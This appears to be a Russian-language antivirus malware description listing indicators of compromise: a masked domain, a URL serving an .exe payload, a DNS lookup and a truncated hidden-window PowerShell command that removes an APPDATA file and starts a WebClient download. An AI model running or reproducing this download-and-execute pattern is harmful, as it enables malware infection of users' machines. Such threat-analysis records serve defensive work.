Техническая информация
- 'he####ilandgas.com':80
- http://www.he####ilandgas.com/aoutdoormove/thurstelsa.exe
- DNS ASK he####ilandgas.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -noprofile If (test-path $env:APPDATA + '\mz9z.exe') {Remove-Item $env:APPDATA + '\mz9z.exe'}; $OEKQD = New-Object System.Net.WebClient; $OEKQD.Headers['User-Agent'] = 'US...' (со скрытым окном)